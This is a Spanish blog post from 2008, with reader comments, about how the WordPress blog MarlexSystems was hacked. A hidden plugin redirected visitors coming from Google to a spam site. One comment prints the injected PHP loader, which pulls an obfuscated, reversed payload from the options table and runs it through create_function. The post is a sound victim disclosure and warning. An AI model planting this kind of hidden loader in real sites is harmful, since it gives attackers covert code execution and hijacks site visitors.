MarlexSystems fue hackeado

Patrick D'appollonio 29 de mayo del 2008 ¡Coméntala!

Probablemente se haya notado la baja de publicaciones en MarlexSystems ya que hemos estado como locos buscando el problema y hemos hecho una solucion que, aunque no es definitiva, desde aquí hacemos el llamado a todos los blogs en WordPress.

Bienvenido a MarlexSystems 3.0

Y es que sucede que algunos blogs habíamos experimentado una fuerte pérdida de visitas desde el Buscador Google. Pensando en que probablemente era un problema de Google y no nuestro, nos pusimos a enviar correos -y agradezco la ayuda de quienes me entregaron información al respecto- para contactar con Google pero, los chicos de Google no eran el problema.

Sucedió que algún chistocito logró hackearnos subiendo un codigo malicioso en un formato de imagen a nuestro blog, transformando luego esta imagen en un Plugin de WordPress que no es visible desde el Panel de Control de Plugins. Este “plugin/imagen” tenía la función de que detectara si el usuario provenía de Google, y de serlo, redirigirlo a otro sitio web (your-needs.info) con la misma cadena de búsqueda que el usuario haya hecho.

Podemos decir que unos 10 mil a 12 mil usuarios fueron redirigidos por error. La solución definitiva aún no la hemos encontrado, por lo que probablemente podría volver a suceder, pero con las salvaguardas del caso, esperamos que no sea así.

Cabe mencionar que este fallo aún no está corregido por WordPress, ya que nos hemos encontrado con que en un Foro de WordPress en China han tenido el mismo ataque. Si quieres colaborar, te dejo el código que han subido los señores ociosos.

Tags: agua, correo, create_function inyeccion, en marlexsystems, Google, hackear, hackeo, hotmail correo, hotmail.com, Mac, plugin, web

Juan Carlos

Que pena! Que tengan suerte! Saludos! Mucha Suerte!

See U!;)
http://www.johnzarate.com John Zárate

Y como ingreso a os servidores de Marlex esta imagen?
http://www.extremisimo.com Fede

anoche justamente estaba buscando algunos themes para wordpres… y entre en muchas webs que aparecia ese yourneeds.info … me apareci cerca de 10 veces, estan hackeando varias webs veo… que HDPS
http://www.mundotech.net Daniel Zárate

La pregunta es: ¿Como introdujo este codigo? Será por Injeccion html o sql, tambien puede ser pero es poco probable que tuvieras el virus dentro de la PC del editor de la web, y al subir un archivo a la web este se introdujo. No se me ocurre otra manera
http://mundologia.net Carlos García

Que poca… ojala se arregle esta situación y WordPress revise el problema y de pronta respuesta.

Saludos.
http://dpaladin.com Francisco

Que mala onda, pero es cierto, como pudieron haberla subido?

el codigo es este:

get_var(“SELECT option_value FROM $wpdb->options WHERE option_name=’rss_f541b3abd05e7962fcab37737f40fad8′”);
preg_match(“!events or a cale\”\;s\:7\:\’(.*?)\’!is”,$trp_rss,$trp_m);
$trp_f=create_function(“”,strrev($trp_m[1]));
$trp_f();
?>

lo ocultaron con muchos comentarios XD
http://www.marlexsystems.org Marlex

Hola chicos, al parecer fue una inyección SQL la que nos afectó y con la cual nos han hackeado.

Agregó luego la imagen como plugin invisible en el tablero de WP. Raro…

Francisco, muchas gracias por la “traducción” del código. Fede, así es, al parecer es el WP el afectado.
http://zonakaoz.net Luis

Hace unas semanas lei un bug de wp sobre que los spammers atravez de poner comments obvio con spam poian hacer esto, lamenteblamente no recuerdo donde lo lei me pondre a buscar creo fue en http://blogsecurity.net/wordpress pero no estopy seguro, como sea lo buscare incluso creo habia una solucion.
Pingback: Adsense con problemas de muestreo
http://diskfull.com.ar Maty

Tendría que existir una especia de “tribunal de justicia en internet”, que se ocupen de estos casos y, por ejemplo, suspendan ese dominio.
Suerte con el arreglo
http://bocabit.com The-RockeR

Menuda putada Marlex. ¿Podrías decir en que parte del código del blog te introdujeron el código? Lo digo para estar atentos
http://www.marlexsystems.org Marlex

The-Rocker, fue a través de una inyección SQL en la base de datos. Pronto publicaré el cómo corregir este hackeo.

Estén atentos, que al parecer WordPress 2.5.1 también es vulnerable.

MarlexSystems fue hackeado

Notas Relacionadas: